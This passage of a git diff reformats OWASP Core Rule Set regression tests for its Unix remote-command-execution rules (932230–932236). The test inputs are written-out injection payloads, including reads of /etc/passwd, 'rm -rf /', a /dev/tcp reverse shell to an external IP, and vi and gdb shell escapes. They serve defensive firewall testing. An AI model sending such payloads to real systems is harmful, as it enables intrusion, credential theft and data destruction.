"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=;performance" + version: HTTP/1.0 + output: + no_log_contains: id "932230" + - test_id: 49 desc: "Block execution of env command with arguments" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: 
"OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: "/post" - data: "args=;env --version" - version: HTTP/1.1 - output: - log_contains: id "932230" - - test_title: 932230-50 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: "/post" + data: "args=;env --version" + version: HTTP/1.1 + output: + log_contains: id "932230" + - test_id: 50 desc: "Block evasion using here string" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=;`cat<<, azurit" description: Tests for fix of 932231 rule triggered with html decimal entities because of using legacy ISO-8859 charsets family - https://github.com/coreruleset/coreruleset/issues/1886 - enabled: true - name: 932231.yaml + rule_id: 932231 tests: - - test_title: 932231-1 + - test_id: 1 desc: | True Negative Rule Integrity 1 arg value of "ifconfig;. rm -rf /; Something „The Title”. 
After space or new line more characters" is blocked stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=ifconfig;.+rm+-rf+/;+Something+%26%238222%3BThe+Title%26%238221%3B.+After+space+or+new+line+more+characters" - version: HTTP/1.0 - output: - log_contains: id "932231" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=ifconfig;.+rm+-rf+/;+Something+%26%238222%3BThe+Title%26%238221%3B.+After+space+or+new+line+more+characters" + version: HTTP/1.0 + output: + log_contains: id "932231" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932232.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932232.yaml index 26f808924..08692c1c1 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932232.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932232.yaml 
@@ -2,128 +2,120 @@ meta: author: "Franziska Bühler, azurit" description: "Remote Command Execution: Unix Command Injection" - enabled: true - name: 932232.yaml +rule_id: 932232 tests: - - test_title: 932232-1 + - test_id: 1 desc: "/?arg=;ps" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=%3Bps" - version: HTTP/1.0 - output: - log_contains: id "932232" - - test_title: 932232-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=%3Bps" + version: HTTP/1.0 + output: + log_contains: id "932232" + - test_id: 2 desc: "/?arg=|vi (x" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=%7Cvi%20%28x" - version: HTTP/1.0 - output: - log_contains: id "932232" - - test_title: 932232-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=%7Cvi%20%28x" + version: HTTP/1.0 + output: + log_contains: id "932232" + - test_id: 3 desc: "/?arg=&w (x" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - 
Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=%26w%20%28x" - version: HTTP/1.0 - output: - log_contains: id "932232" - - test_title: 932232-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=%26w%20%28x" + version: HTTP/1.0 + output: + log_contains: id "932232" + - test_id: 4 desc: "/?arg=&aptitude" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=%26aptitude" - version: HTTP/1.0 - output: - no_log_contains: id "932232" - - test_title: 932232-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=%26aptitude" + version: HTTP/1.0 + output: + no_log_contains: id "932232" + - test_id: 5 desc: Remote Command Execution bypass with time stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo=time+who" - version: HTTP/1.1 - output: - log_contains: "id \"932232\"" - - test_title: 932232-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?foo=time+who" + version: HTTP/1.1 + output: + log_contains: "id \"932232\"" + - test_id: 6 desc: Remote Command Execution bypass with time negative test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo=time+warner" - version: HTTP/1.1 - output: - no_log_contains: "id \"932232\"" - - test_title: 932232-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?foo=time+warner" + version: HTTP/1.1 + output: + no_log_contains: "id \"932232\"" + - test_id: 7 desc: Remote Command Injection test for BB finding 935E1D91 - time evasion attempt stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo=ti''me+who" - version: HTTP/1.1 - output: - log_contains: "id \"932232\"" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 
+ method: GET + port: 80 + uri: "/get?foo=ti''me+who" + version: HTTP/1.1 + output: + log_contains: "id \"932232\"" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml index ed96bb847..e48735f53 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml 
@@ -2,685 +2,646 @@ meta: author: "Max Leske, Esad Cetiner, Xhoenix, Franziska Bühler, azurit" description: Unix shell RCE wordlist for more than 3 characters - enabled: true - name: 932235.yaml +rule_id: 932235 tests: - - test_title: 932235-1 + - test_id: 1 desc: "4JOGUXYQ" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;find /etc -name passwd -exec cat {} + - version: HTTP/1.0 - output: - log_contains: id "932235" - - test_title: 932235-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;find /etc -name passwd -exec cat {} + + version: HTTP/1.0 + output: + log_contains: id "932235" + - test_id: 2 desc: "5Y3V6UZT" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=cd /;cd etc;column passwd - version: HTTP/1.0 - output: - log_contains: id "932235" - - test_title: 932235-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=cd /;cd etc;column passwd + version: HTTP/1.0 + output: + log_contains: id "932235" + - test_id: 3 desc: "6BIVX1QB" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=cd /;cd etc;bridge -b passwd - version: HTTP/1.0 - output: - log_contains: id "932235" - - test_title: 932235-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=cd /;cd etc;bridge -b passwd + version: HTTP/1.0 + output: + log_contains: id "932235" + - test_id: 4 desc: "7JRJIWP8" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=cd /;cd etc;fold passwd - version: HTTP/1.0 - output: - log_contains: id "932235" - - test_title: 932235-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=cd /;cd etc;fold passwd + version: HTTP/1.0 + output: + log_contains: id "932235" + - test_id: 5 desc: "ANQ9SN3S" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;flock -u / whoami - version: HTTP/1.0 - output: - log_contains: id "932235" - - test_title: 932235-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;flock -u / whoami + version: HTTP/1.0 + output: + log_contains: id "932235" + - test_id: 6 desc: "AVI5619I" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;cd /;cd etc;base32 passwd|base32 -d - version: HTTP/1.0 - output: - log_contains: id "932235" - - test_title: 932235-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;cd /;cd etc;base32 passwd|base32 -d + version: HTTP/1.0 + output: + log_contains: id "932235" + - test_id: 7 desc: "P6E0KY27" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=;cpulimit -l 100 -f whoami - output: - log_contains: id "932235" - - test_title: 932235-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=;cpulimit -l 100 -f whoami + output: + log_contains: id "932235" + - test_id: 8 desc: "PDDUY935" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - cd /;cd etc;comm passwd passwd - output: - log_contains: id "932235" - - test_title: 932235-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + cd /;cd etc;comm passwd passwd + output: + log_contains: id "932235" + - test_id: 9 desc: "PDDUY935 - but uppercase" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - CD /;CD ETC;COMM PASSWD PASSWD - output: - log_contains: id "932235" - - test_title: 932235-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + CD /;CD ETC;COMM PASSWD PASSWD + output: + log_contains: id "932235" + - test_id: 10 desc: "FP with word comment" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=comment" - version: HTTP/1.0 - output: - no_log_contains: id "932235" - - test_title: 932235-11 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=comment" + version: HTTP/1.0 + output: + no_log_contains: id "932235" + - test_id: 11 desc: "FP with word performance" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=;performance" - version: HTTP/1.0 - output: - no_log_contains: id "932235" - - test_title: 932235-12 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=;performance" + version: HTTP/1.0 + output: + no_log_contains: id "932235" + - test_id: 12 desc: "Block execution of perf command with arguments" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: "/post" - data: "args=;perf --version" - version: HTTP/1.1 - output: - log_contains: id "932235" - - test_title: 932235-13 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: "/post" + data: "args=;perf --version" + version: HTTP/1.1 + output: + log_contains: id "932235" + - test_id: 13 desc: "Block evasion using here string" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - 
Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=;`cat<<$d/tcp/51.15.142.164/777" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?cmd=d%3D%2Fdev%26%26(sh)0%3E%24d%2Ftcp%2F51.15.142.164%2F777" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?cmd=d%3D%2Fdev%26%26(sh)0%3E%24d%2Ftcp%2F51.15.142.164%2F777" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 4 desc: "55O5COJ5" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;c89 -wrapper sh,-c,id . - version: HTTP/1.0 - output: - log_contains: id "932236" - - test_title: 932236-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;c89 -wrapper sh,-c,id . 
+ version: HTTP/1.0 + output: + log_contains: id "932236" + - test_id: 5 desc: "55O5COJ5" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;c89 -wrapper sh,-c,curl\ google.com . - version: HTTP/1.0 - output: - log_contains: id "932236" - - test_title: 932236-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;c89 -wrapper sh,-c,curl\ google.com . + version: HTTP/1.0 + output: + log_contains: id "932236" + - test_id: 6 desc: "9323HNQU - should not be detected at PL 2" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;vi dddd +silent\\ \!whoami +wq - version: HTTP/1.0 - output: - no_log_contains: id "932236" - - test_title: 932236-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;vi dddd +silent\\ \!whoami +wq + version: HTTP/1.0 + output: + no_log_contains: id "932236" + - test_id: 7 desc: "9323HNQU" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: 
"/post" - data: | - code=;vim dddd +silent\\ \!whoami +wq - version: HTTP/1.0 - output: - log_contains: id "932236" - - test_title: 932236-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;vim dddd +silent\\ \!whoami +wq + version: HTTP/1.0 + output: + log_contains: id "932236" + - test_id: 8 desc: "9323HNQU" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;ex dddd +silent\\ \!whoami +wq - version: HTTP/1.0 - output: - log_contains: id "932236" - - test_title: 932236-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;ex dddd +silent\\ \!whoami +wq + version: HTTP/1.0 + output: + log_contains: id "932236" + - test_id: 9 desc: "9323HNQU - should not be detected at PL 2" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;vi -c:\!pwd - version: HTTP/1.0 - output: - no_log_contains: id "932236" - - test_title: 932236-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: 
"/post" + data: | + code=;vi -c:\!pwd + version: HTTP/1.0 + output: + no_log_contains: id "932236" + - test_id: 10 desc: "9323HNQU" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;vim -c:\!pwd - version: HTTP/1.0 - output: - log_contains: id "932236" - - test_title: 932236-11 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;vim -c:\!pwd + version: HTTP/1.0 + output: + log_contains: id "932236" + - test_id: 11 desc: "9323HNQU" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;ex -c:\!pwd - version: HTTP/1.0 - output: - log_contains: id "932236" - - test_title: 932236-12 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;ex -c:\!pwd + version: HTTP/1.0 + output: + log_contains: id "932236" + - test_id: 12 desc: "ATFHUJVF" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;gdb -nx -ex \!whoami -ex quit - version: HTTP/1.0 - output: - 
log_contains: id "932236" - - test_title: 932236-13 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;gdb -nx -ex \!whoami -ex quit + version: HTTP/1.0 + output: + log_contains: id "932236" + - test_id: 13 desc: "JW2SU88A" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=;cat /path/file.gz - output: - log_contains: id "932236" - - test_title: 932236-14 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=;cat /path/file.gz + output: + log_contains: id "932236" + - test_id: 14 desc: "4JOGUXYQ" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - find /etc -name passwd -exec cat {} + - output: - log_contains: id "932236" - - test_title: 932236-15 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + find /etc -name passwd -exec cat {} + + output: + log_contains: id "932236" + - test_id: 15 
